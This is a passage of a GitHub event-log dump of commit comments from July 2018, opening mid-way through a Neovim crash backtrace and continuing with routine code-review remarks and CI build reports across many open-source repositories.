get_func_tv (\r\n    name=0x7fa5ae5e5ac0 \"neomake#quickfix#FormatQuickfix\", len=31, rettv=0x7ffee7536b10, \r\n    arg=0x7ffee7536ae0, firstline=1, lastline=1, doesrange=0x7ffee7536adc, evaluate=1, \r\n    partial=0x0, selfdict=0x0) at ../src/nvim/eval.c:6114\r\n#18 0x000055dffe67c61b in ex_call (eap=0x7ffee7536c40) at ../src/nvim/eval.c:2727\r\n#19 0x000055dffe6e59b9 in do_one_cmd (cmdlinep=0x7ffee7536e40, flags=7, \r\n    cstack=0x7ffee7536f50, fgetline=0x55dffe71eefc <getnextac>, cookie=0x7ffee7537540)\r\n    at ../src/nvim/ex_docmd.c:2228\r\n#20 0x000055dffe6e207f in do_cmdline (cmdline=0x0, fgetline=0x55dffe71eefc <getnextac>, \r\n    cookie=0x7ffee7537540, flags=7) at ../src/nvim/ex_docmd.c:592\r\n#21 0x000055dffe71e937 in apply_autocmds_group (event=EVENT_FILETYPE, \r\n    fname=0x7fa5ae5f7ee0 \"qf\", fname_io=0x0, force=true, group=-3, buf=0x7fa5ae6e1000, \r\n    eap=0x0) at ../src/nvim/fileio.c:6933\r\n#22 0x000055dffe71e07a in apply_autocmds (event=EVENT_FILETYPE, fname=0x7fa5ae5f7f10 \"qf\", \r\n    fname_io=0x0, force=true, buf=0x7fa5ae6e1000) at ../src/nvim/fileio.c:6576\r\n#23 0x000055dffe7b50ff in did_set_string_option (opt_idx=91, varp=0x7fa5ae6e3450, \r\n    new_value_alloced=1, oldval=0x55dffe8d9392 \"\", errbuf=0x0, opt_flags=4)\r\n    at ../src/nvim/option.c:3244\r\n#24 0x000055dffe7b2181 in set_string_option (opt_idx=91, value=0x55dffe8e7411 \"qf\", \r\n    opt_flags=4) at ../src/nvim/option.c:2384\r\n#25 0x000055dffe7b95da in set_option_value (name=0x55dffe8e7414 \"ft\", number=0, \r\n    string=0x55dffe8e7411 \"qf\", opt_flags=4) at ../src/nvim/option.c:4836\r\n#26 0x000055dffe7d8ec9 in qf_fill_buffer (qi=0x7fa5af47f000, buf=0x7fa5ae6e1000, \r\n    old_last=0x0) at ../src/nvim/quickfix.c:3012\r\n#27 0x000055dffe7d8442 in ex_copen (eap=0x7ffee7537a40) at ../src/nvim/quickfix.c:2709\r\n#28 0x000055dffe7d7f6f in ex_cwindow (eap=0x7ffee7537a40) at ../src/nvim/quickfix.c:2582\r\n#29 0x000055dffe6e59b9 in do_one_cmd (cmdlinep=0x7ffee7537c40, flags=0, \r\n    cstack=0x7ffee7537d50, fgetline=0x55dffe700662 <getexline>, cookie=0x0)\r\n    at ../src/nvim/ex_docmd.c:2228\r\n#30 0x000055dffe6e207f in do_cmdline (cmdline=0x0, fgetline=0x55dffe700662 <getexline>, \r\n    cookie=0x0, flags=0) at ../src/nvim/ex_docmd.c:592\r\n#31 0x000055dffe7959a7 in nv_colon (cap=0x7ffee75383d0) at ../src/nvim/normal.c:4561\r\n#32 0x000055dffe78e191 in normal_execute (state=0x7ffee7538330, key=58)\r\n    at ../src/nvim/normal.c:1137\r\n#33 0x000055dffe85a33e in state_enter (s=0x7ffee7538330) at ../src/nvim/state.c:67\r\n#34 0x000055dffe78c43c in normal_enter (cmdwin=false, noexmode=false)\r\n    at ../src/nvim/normal.c:467\r\n#35 0x000055dffe750310 in main (argc=2, argv=0x7ffee7538688) at ../src/nvim/main.c:567\r\n```"}},"created_at":"2018-07-26T04:53:59Z"}
{"id":"8020420242","type":"CommitCommentEvent","actor":{"login":"MachinoNekomata"},"repo":{"name":"MinatsuT/PSoC5_USB_Keyboard"},"payload":{"comment":{"id":29838746,"position":null,"line":null,"path":null,"commit_id":"b858528e7adf5951f246221cba2e3d8b4be47625","created_at":"2018-07-26T04:54:11Z","updated_at":"2018-07-26T04:54:11Z","author_association":"NONE","body":"Tx とRxをアサインし直すことで秋月FTDIのUSBモジュールに接続、115200で通信できました。ありがとうございます。"}},"created_at":"2018-07-26T04:54:11Z"}
{"id":"8020421668","type":"CommitCommentEvent","actor":{"login":"andrew-boyarshin"},"repo":{"name":"hvanbakel/CsprojToVs2017"},"payload":{"comment":{"id":29838749,"position":7,"line":22,"path":"README.md","commit_id":"9ee7766447f3f5dc9a2cdcf8b4c9707e4c39769a","created_at":"2018-07-26T04:54:51Z","updated_at":"2018-07-26T04:54:51Z","author_association":"CONTRIBUTOR","body":"Feels like the sentence is not finished here."}},"created_at":"2018-07-26T04:54:51Z"}
{"id":"8020422411","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29838753,"position":null,"line":null,"path":null,"commit_id":"67b6539d98db3a3d50061be1a315e6f93fdd6b8f","created_at":"2018-07-26T04:55:12Z","updated_at":"2018-07-26T04:55:12Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/oblong-unread-notification-in-mobile/93025/3\n"}},"created_at":"2018-07-26T04:55:12Z"}
{"id":"8020426606","type":"CommitCommentEvent","actor":{"login":"sunghan-chang"},"repo":{"name":"Samsung/TizenRT"},"payload":{"comment":{"id":29838756,"position":24,"line":447,"path":"os/include/time.h","commit_id":"9108ac1c65c5df83702eb119a3a51fec6913864f","created_at":"2018-07-26T04:56:51Z","updated_at":"2018-07-26T04:56:51Z","author_association":"CONTRIBUTOR","body":"Is there tc?"}},"created_at":"2018-07-26T04:56:51Z"}
{"id":"8020432875","type":"CommitCommentEvent","actor":{"login":"sunghan-chang"},"repo":{"name":"Samsung/TizenRT"},"payload":{"comment":{"id":29838766,"position":null,"line":null,"path":null,"commit_id":"290d7786681ac3ec41cf373f5c4d107fe9f48f8c","created_at":"2018-07-26T04:59:36Z","updated_at":"2018-07-26T04:59:36Z","author_association":"CONTRIBUTOR","body":"Why is this \"fix\"? Percentage can be float type like 10.5% ."}},"created_at":"2018-07-26T04:59:36Z"}
{"id":"8020433780","type":"CommitCommentEvent","actor":{"login":"sashaba"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29838768,"position":null,"line":null,"path":null,"commit_id":"d16ff3bd8b92fa84a9007bf5ebedd8153e4c089d","created_at":"2018-07-26T05:00:00Z","updated_at":"2018-07-26T05:00:00Z","author_association":"NONE","body":"To use this solution do i have to  just modify `node_modules/react-native/react.gradle` adding these changes? "}},"created_at":"2018-07-26T05:00:00Z"}
{"id":"8020442239","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"I24046025/X-Village-HW1"},"payload":{"comment":{"id":29838788,"position":null,"line":null,"path":null,"commit_id":"2dd53b3dd3f703d0faa2768799463041a921f3e6","created_at":"2018-07-26T05:03:23Z","updated_at":"2018-07-26T05:03:23Z","author_association":"NONE","body":"對物件的理解很不錯，寫得很OO，\r\n有幾個 convention 的小問題，\r\n1. `==` 這類 operator 前後要有空白\r\n2. `a = 3` assign的等號前後要有空白\r\n3. `func(arg1, arg2)` 逗號後要有空白，跟 list 同理，例如 `[1, 2, 3, 4]`"}},"created_at":"2018-07-26T05:03:23Z"}
{"id":"8020445755","type":"CommitCommentEvent","actor":{"login":"a1rwulf"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":29838797,"position":2,"line":177,"path":"xbmc/dialogs/GUIDialogProgress.cpp","commit_id":"4c07b52ee24af0f4173cedf93ccc2ef70d3902af","created_at":"2018-07-26T05:04:54Z","updated_at":"2018-07-26T05:04:54Z","author_association":"MEMBER","body":"comment missed in this line as well"}},"created_at":"2018-07-26T05:04:54Z"}
{"id":"8020447520","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29838800,"position":null,"line":null,"path":null,"commit_id":"2b92aeea905ed59efaa4e7f11735ba033f42d202","created_at":"2018-07-26T05:05:39Z","updated_at":"2018-07-26T05:05:39Z","author_association":"NONE","body":"@protonspring Respectfully, I think this is a [0, 4] parameter tweak.  Regardless of the speed, code complexity is neither increased nor decreased by this patch.\r\n\r\nHowever, I've also been wondering whether this kind of change is a simplification (and I have considered similar tests myself), so I'm eager to hear what other people have to say."}},"created_at":"2018-07-26T05:05:39Z"}
{"id":"8020448258","type":"CommitCommentEvent","actor":{"login":"samgrande"},"repo":{"name":"DotOS/android_packages_apps_Dialer"},"payload":{"comment":{"id":29838802,"position":null,"line":null,"path":null,"commit_id":"d368a016b5aac3cd9ba57ed13b0dd1f4a5f782f0","created_at":"2018-07-26T05:05:55Z","updated_at":"2018-07-26T05:05:55Z","author_association":"CONTRIBUTOR","body":"Thanks i have corrected the authorship ,though its quite different if you see what i aimed for."}},"created_at":"2018-07-26T05:05:55Z"}
{"id":"8020450172","type":"CommitCommentEvent","actor":{"login":"mountainMath"},"repo":{"name":"mountainMath/cansim"},"payload":{"comment":{"id":29838807,"position":null,"line":null,"path":null,"commit_id":"940af3ca0e13abc1c3202e18bc1bb8ad47643c98","created_at":"2018-07-26T05:06:42Z","updated_at":"2018-07-26T05:06:42Z","author_association":"OWNER","body":"Fixed."}},"created_at":"2018-07-26T05:06:42Z"}
{"id":"8020451555","type":"CommitCommentEvent","actor":{"login":"a1rwulf"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":29838810,"position":31,"line":528,"path":"xbmc/filesystem/PluginDirectory.cpp","commit_id":"4c07b52ee24af0f4173cedf93ccc2ef70d3902af","created_at":"2018-07-26T05:07:19Z","updated_at":"2018-07-26T05:07:19Z","author_association":"MEMBER","body":"could you elaborate why you give 20ms progresstime into the ProgressDialog but 200 into BusyDialog.\r\nI have the feeling that we should not expose this to the caller unless you have good arguments, it will lead to a lot of magic numbers in the code."}},"created_at":"2018-07-26T05:07:19Z"}
{"id":"8020451851","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29838812,"position":null,"line":null,"path":null,"commit_id":"5c85ed64fb4492a0d0a1c197b246208afcd1ad34","created_at":"2018-07-26T05:07:26Z","updated_at":"2018-07-26T05:07:26Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2988 of 2988 tests passed, 627 test warnings)\n\nMessages:\n\n * 627 tests had: EIO diffs.\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5c85ed64fb4492a0d0a1c197b246208afcd1ad34-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5c85ed64fb4492a0d0a1c197b246208afcd1ad34-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T05:07:26Z"}
{"id":"8020453039","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"I24046025/X-Village-HW1"},"payload":{"comment":{"id":29838816,"position":null,"line":null,"path":null,"commit_id":"e2a4b8164ce523fc03bfd3e5c7f7d880a678dd23","created_at":"2018-07-26T05:07:54Z","updated_at":"2018-07-26T05:07:54Z","author_association":"NONE","body":"try...finally... 這個應用的情境不太對，\r\n應該是對 try 的理解不夠，可以再去看一下 exception"}},"created_at":"2018-07-26T05:07:54Z"}
{"id":"8020455880","type":"CommitCommentEvent","actor":{"login":"kayvonf"},"repo":{"name":"scanner-research/scanner"},"payload":{"comment":{"id":29838821,"position":14,"line":16,"path":"scanner/engine/scheduler.h","commit_id":"67bc417a4a666f3fa78ee02ad89a1f43fc46200b","created_at":"2018-07-26T05:09:08Z","updated_at":"2018-07-26T05:09:08Z","author_association":"CONTRIBUTOR","body":"Assignable elements are not assigned to actors. They are processed by a graph operation (what's being called an actor) and *assigned* to a worker that will carry out the operation on the element. "}},"created_at":"2018-07-26T05:09:08Z"}
{"id":"8020456216","type":"CommitCommentEvent","actor":{"login":"aben20807"},"repo":{"name":"aben20807/re-bridgechat"},"payload":{"comment":{"id":29838822,"position":null,"line":null,"path":null,"commit_id":"27b35d226af80c3770b70075a61262b6539191e9","created_at":"2018-07-26T05:09:15Z","updated_at":"2018-07-26T05:09:15Z","author_association":"OWNER","body":"#3 "}},"created_at":"2018-07-26T05:09:15Z"}
{"id":"8020456714","type":"CommitCommentEvent","actor":{"login":"BosEriko"},"repo":{"name":"ajsabandal/aj-sdrawing"},"payload":{"comment":{"id":29838823,"position":null,"line":null,"path":null,"commit_id":"94ede4907d9b7d2ac104841b0a64c90abd6a9c68","created_at":"2018-07-26T05:09:28Z","updated_at":"2018-07-26T05:09:28Z","author_association":"NONE","body":"Don't name your index page randomly. Use index.html. So that the folder itself knows which html to load when opened."}},"created_at":"2018-07-26T05:09:28Z"}
{"id":"8020458612","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"I24046025/X-Village-HW1"},"payload":{"comment":{"id":29838827,"position":45,"line":81,"path":"matrix.py","commit_id":"e2a4b8164ce523fc03bfd3e5c7f7d880a678dd23","created_at":"2018-07-26T05:10:13Z","updated_at":"2018-07-26T05:10:13Z","author_association":"NONE","body":"通常判斷是不是 None，會用 `is`，應該寫成 `A.add(B) is None`"}},"created_at":"2018-07-26T05:10:13Z"}
{"id":"8020459782","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29838829,"position":null,"line":null,"path":null,"commit_id":"fc91e747b7f09d1a7d95efde55fb7530df2b7809","created_at":"2018-07-26T05:10:40Z","updated_at":"2018-07-26T05:10:40Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - Win64-Windows-7-VisualStudio-14: OK (2932 of 2948 tests passed, 21 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 26 tests had: EIO diffs.\n * 12 tests had: ESO small diffs.\n * 8 tests had: MTR small diffs.\n * 9 tests had: Table small diffs.\n * 14 tests had: ESO big diffs.\n * 15 tests had: Table big diffs.\n * 4 tests had: ERR diffs.\n * 9 tests had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 607\n * Failed: 16\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc91e747b7f09d1a7d95efde55fb7530df2b7809-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc91e747b7f09d1a7d95efde55fb7530df2b7809-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.46%25-yellow.png)</a> \n"}},"created_at":"2018-07-26T05:10:40Z"}
{"id":"8020459939","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29838831,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-26T05:10:45Z","updated_at":"2018-07-26T05:10:45Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-26T05:10:45Z"}
{"id":"8020461513","type":"CommitCommentEvent","actor":{"login":"kayvonf"},"repo":{"name":"scanner-research/scanner"},"payload":{"comment":{"id":29838835,"position":21,"line":19,"path":"scanner/engine/scheduler.h","commit_id":"67bc417a4a666f3fa78ee02ad89a1f43fc46200b","created_at":"2018-07-26T05:11:23Z","updated_at":"2018-07-26T05:11:23Z","author_association":"CONTRIBUTOR","body":"to make the comment more clear: The computation that computes this element depends on elements that are not yet available.  Therefore it cannot be assigned to a worker."}},"created_at":"2018-07-26T05:11:23Z"}
{"id":"8020464124","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29838839,"position":null,"line":null,"path":null,"commit_id":"5c85ed64fb4492a0d0a1c197b246208afcd1ad34","created_at":"2018-07-26T05:12:26Z","updated_at":"2018-07-26T05:12:26Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5c85ed64fb4492a0d0a1c197b246208afcd1ad34-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-26T05:12:26Z"}
{"id":"8020465584","type":"CommitCommentEvent","actor":{"login":"tgulacsi"},"repo":{"name":"go-goracle/goracle"},"payload":{"comment":{"id":29838840,"position":75,"line":546,"path":"drv.go","commit_id":"554bb29a03b89e333e37565c74246e6c72023929","created_at":"2018-07-26T05:13:02Z","updated_at":"2018-07-26T05:13:02Z","author_association":"CONTRIBUTOR","body":"I'd buy standaloneConnection, but we already have pool{Increment,MaxSessions,MinSessions} and this should say to NOT use a pool. And standaloneConnection does introduces a new concept.\r\n\r\nWhat about forgetting it and saying that \"poolIncrement=0&poolMaxSessions=0&poolMinSessions=0\" means using no session pooling ?"}},"created_at":"2018-07-26T05:13:02Z"}
{"id":"8020468246","type":"CommitCommentEvent","actor":{"login":"Jules-A"},"repo":{"name":"TASVideos/desmume"},"payload":{"comment":{"id":29838846,"position":null,"line":null,"path":null,"commit_id":"b0a6188902b1657451b413aa76c855145d6c375e","created_at":"2018-07-26T05:14:04Z","updated_at":"2018-07-26T05:14:04Z","author_association":"NONE","body":"If my CPU has 8 cores, is it meant to say \"additional 8 threads\" (main thread +8 render threads?)."}},"created_at":"2018-07-26T05:14:04Z"}
{"id":"8020472787","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"I24046025/X-Village-HW1"},"payload":{"comment":{"id":29838854,"position":9,"line":84,"path":"matrix.py","commit_id":"68108b5e2911e5e2cd595b8961aeed8163004015","created_at":"2018-07-26T05:15:49Z","updated_at":"2018-07-26T05:15:49Z","author_association":"NONE","body":"這樣 `if...else...` 判斷式的寫法，會讓你的矩陣運算都做兩次，\r\n可以先將運算結果 assign 給一個變數，再去判斷是不是 None，\r\n如果不是None，在 `display()`"}},"created_at":"2018-07-26T05:15:49Z"}
{"id":"8020477631","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"I24046025/X-Village-HW1"},"payload":{"comment":{"id":29838866,"position":37,"line":76,"path":"matrix.py","commit_id":"2c9b1ffdabc6e58ce03b8ad12783c25f58f27f29","created_at":"2018-07-26T05:17:42Z","updated_at":"2018-07-26T05:17:42Z","author_association":"NONE","body":"這個 `pass` 是多餘的"}},"created_at":"2018-07-26T05:17:42Z"}
{"id":"8020488232","type":"CommitCommentEvent","actor":{"login":"BrennanColberg"},"repo":{"name":"BrennanColberg/carbon"},"payload":{"comment":{"id":29838883,"position":null,"line":null,"path":null,"commit_id":"9a645cdd4a32bc7a55803fc37903081c72404f04","created_at":"2018-07-26T05:21:49Z","updated_at":"2018-07-26T05:21:49Z","author_association":"OWNER","body":"references #1 (forgot in commit)"}},"created_at":"2018-07-26T05:21:49Z"}
{"id":"8020489067","type":"CommitCommentEvent","actor":{"login":"biwiker"},"repo":{"name":"biwiker/UAP"},"payload":{"comment":{"id":29838885,"position":null,"line":null,"path":null,"commit_id":"eca9e2817bea670cc701ce5291d515ca12bdf420","created_at":"2018-07-26T05:22:10Z","updated_at":"2018-07-26T05:22:10Z","author_association":"OWNER","body":"oye! ta malo!!"}},"created_at":"2018-07-26T05:22:10Z"}
{"id":"8020489941","type":"CommitCommentEvent","actor":{"login":"biwiker"},"repo":{"name":"biwiker/UAP"},"payload":{"comment":{"id":29838886,"position":11,"line":11,"path":"src/desarrollos/Persona.java","commit_id":"eca9e2817bea670cc701ce5291d515ca12bdf420","created_at":"2018-07-26T05:22:30Z","updated_at":"2018-07-26T05:22:30Z","author_association":"OWNER","body":"caca\r\n"}},"created_at":"2018-07-26T05:22:30Z"}
{"id":"8020517012","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29838928,"position":152,"line":146,"path":"test/iterators/sort.test.ts","commit_id":"adfba695bac741c160fc05811ec72dd607d24244","created_at":"2018-07-26T05:32:43Z","updated_at":"2018-07-26T05:32:43Z","author_association":"CONTRIBUTOR","body":"Maybe not the best example as it is already sorted desc. \r\nSwitch elements and ensure that proper sorting in descending order works."}},"created_at":"2018-07-26T05:32:43Z"}
{"id":"8020517877","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29838933,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-26T05:33:04Z","updated_at":"2018-07-26T05:33:04Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-26T05:33:04Z"}
{"id":"8020524433","type":"CommitCommentEvent","actor":{"login":"rogerman"},"repo":{"name":"TASVideos/desmume"},"payload":{"comment":{"id":29838940,"position":null,"line":null,"path":null,"commit_id":"b0a6188902b1657451b413aa76c855145d6c375e","created_at":"2018-07-26T05:35:34Z","updated_at":"2018-07-26T05:35:34Z","author_association":"COLLABORATOR","body":"Yes, that is exactly what that means.\r\n\r\nIf you set CommonSettings.num_cores to 8, then SoftRasterizer creates an additional 8 threads that are dedicated only for itself. As the text says, it is 8 threads in addition to the myriad of other threads that DeSmuME is running, such as the main emulation thread, audio thread, display thread, input/GUI thread, and so on."}},"created_at":"2018-07-26T05:35:34Z"}
{"id":"8020525339","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29838941,"position":3,"line":9,"path":"lib/reducers/average.ts","commit_id":"6f208100c07beb7e655c1b1fb493a395d984c177","created_at":"2018-07-26T05:35:58Z","updated_at":"2018-07-26T05:35:58Z","author_association":"CONTRIBUTOR","body":"What if average of elements results in 0?\r\nSeems like 0 average will always return undefined value."}},"created_at":"2018-07-26T05:35:58Z"}
{"id":"8020529374","type":"CommitCommentEvent","actor":{"login":"rubinatorz"},"repo":{"name":"Parsely/pykafka"},"payload":{"comment":{"id":29838947,"position":null,"line":null,"path":null,"commit_id":"858554029830e15cfa6d15df002d1772672d8ee0","created_at":"2018-07-26T05:37:28Z","updated_at":"2018-07-26T05:37:28Z","author_association":"NONE","body":"Hi @emmett9001,\r\n\r\nYou removed the remarks on librdkafka that you only test against version 0.9.1. Does this mean that pykafka now also supports newer versions? Including the newest 0.11.5?\r\n\r\nHope to hear from you! We definitely want to upgrade from 0.9.1 but are cautious.\r\n\r\nThanks!"}},"created_at":"2018-07-26T05:37:28Z"}
{"id":"8020534527","type":"CommitCommentEvent","actor":{"login":"FireEmerald"},"repo":{"name":"ProgTrade/nUpdate"},"payload":{"comment":{"id":29838954,"position":18,"line":18,"path":"nUpdate.WPFUpdateInstaller/App.xaml.cs","commit_id":"739d66e8750eb7bb3fcafbbbffe867375f7d20e8","created_at":"2018-07-26T05:39:28Z","updated_at":"2018-07-26T05:39:28Z","author_association":"NONE","body":"Remove?"}},"created_at":"2018-07-26T05:39:28Z"}
{"id":"8020535409","type":"CommitCommentEvent","actor":{"login":"aserebryakov"},"repo":{"name":"clckwrkbdgr/godville-monitor-console"},"payload":{"comment":{"id":29838956,"position":null,"line":null,"path":null,"commit_id":"c1e735880b8b320195ff2929b6fbe059392b3a76","created_at":"2018-07-26T05:39:47Z","updated_at":"2018-07-26T05:39:47Z","author_association":"NONE","body":"Now after I got a python course, I understood that these decorators has \"C++/Java\" accent in this case =)"}},"created_at":"2018-07-26T05:39:47Z"}
{"id":"8020537422","type":"CommitCommentEvent","actor":{"login":"swjz"},"repo":{"name":"scanner-research/scanner"},"payload":{"comment":{"id":29838959,"position":21,"line":19,"path":"scanner/engine/scheduler.h","commit_id":"67bc417a4a666f3fa78ee02ad89a1f43fc46200b","created_at":"2018-07-26T05:40:31Z","updated_at":"2018-07-26T05:40:31Z","author_association":"CONTRIBUTOR","body":"Sure I'll take that."}},"created_at":"2018-07-26T05:40:31Z"}
{"id":"8020538158","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"AndyGrant/Stockfish"},"payload":{"comment":{"id":29838961,"position":null,"line":null,"path":null,"commit_id":"4e6f4f693e16a74a400b9a649cbcb57f475510fd","created_at":"2018-07-26T05:40:48Z","updated_at":"2018-07-26T05:40:48Z","author_association":"OWNER","body":"Sight difference worked out for me https://github.com/AndyGrant/Ethereal/commit/e56eda07a9ebf4d2eb17f6ab53635da36235d970 ( SF and Ethereal are about the same ProbCut code, since I wrote it )\r\n\r\nDifference here is two fold, one, at depth 5, we search once with depth 2, instead of qsearch and depth 1 search. I suspect that is not worth any elo.\r\n\r\nIt also makes sense that the qsearch verification is just too shallow to tell us much, (although many others have tried depth - 8, depth - N, after the recent changes were passed).\r\n\r\n"}},"created_at":"2018-07-26T05:40:48Z"}
{"id":"8020540929","type":"CommitCommentEvent","actor":{"login":"tonyyyye"},"repo":{"name":"shinoi2/fireplace"},"payload":{"comment":{"id":29838965,"position":null,"line":null,"path":null,"commit_id":"5f480e4f3a157f01a7a57a7fb8c7aa230087aecb","created_at":"2018-07-26T05:41:50Z","updated_at":"2018-07-26T05:41:50Z","author_association":"NONE","body":"what I meant is that  Shifting_Scroll is a \"0-cost-spell\" but it should not be included in the RandomSpell list of Servant of Yogg-Saron and any cards related to 'no more than X-cost'.\r\n\r\nSince Random spell cast (with random spell name and random spell target) is a new feature, the exeption list may seem usable."}},"created_at":"2018-07-26T05:41:50Z"}
{"id":"8020546818","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29838976,"position":6,"line":17,"path":"lib/iterators/take.ts","commit_id":"b472ac08a8618db6c14dec4dcdff8d33f401b30a","created_at":"2018-07-26T05:43:58Z","updated_at":"2018-07-26T05:43:58Z","author_association":"CONTRIBUTOR","body":"Can we simplify code and avoid this `if` statement?\r\nWhat if instead, below we say:\r\n` return until(source, (elem, idx) => idx <= count);`"}},"created_at":"2018-07-26T05:43:58Z"}
{"id":"8020551854","type":"CommitCommentEvent","actor":{"login":"zeokro"},"repo":{"name":"zjsnr/zjsnr.github.io"},"payload":{"comment":{"id":29838984,"position":null,"line":null,"path":null,"commit_id":"be4954737a22ccad8f72920955a9c97a429765d5","created_at":"2018-07-26T05:45:49Z","updated_at":"2018-07-26T05:45:49Z","author_association":"NONE","body":"Hi,\r\n\r\n请问还有更多API开放吗？"}},"created_at":"2018-07-26T05:45:49Z"}
{"id":"8020553925","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29838988,"position":4,"line":21,"path":"lib/iterators/until.ts","commit_id":"b472ac08a8618db6c14dec4dcdff8d33f401b30a","created_at":"2018-07-26T05:46:36Z","updated_at":"2018-07-26T05:46:36Z","author_association":"CONTRIBUTOR","body":"This changes the behavior of `until`.\r\nThe idea is that it iterates as long as the predicate is satisfied.\r\nWith this line moved above, means last element returned by until might not satisfy my predicate.\r\n"}},"created_at":"2018-07-26T05:46:36Z"}
{"id":"8020555941","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29838991,"position":null,"line":null,"path":null,"commit_id":"5c85ed64fb4492a0d0a1c197b246208afcd1ad34","created_at":"2018-07-26T05:47:22Z","updated_at":"2018-07-26T05:47:22Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1700 of 1700 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5c85ed64fb4492a0d0a1c197b246208afcd1ad34-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5c85ed64fb4492a0d0a1c197b246208afcd1ad34-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5c85ed64fb4492a0d0a1c197b246208afcd1ad34-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.03%25-green.png)</a>\n"}},"created_at":"2018-07-26T05:47:22Z"}
{"id":"8020557466","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29838995,"position":122,"line":54,"path":"components/list/index.tsx","commit_id":"91b97d7b25ceb26d1f56fa34272870a18d0c055d","created_at":"2018-07-26T05:47:57Z","updated_at":"2018-07-26T05:47:57Z","author_association":"MEMBER","body":"发现 rowKey 和 dataSource 都没有写到文档里？"}},"created_at":"2018-07-26T05:47:57Z"}
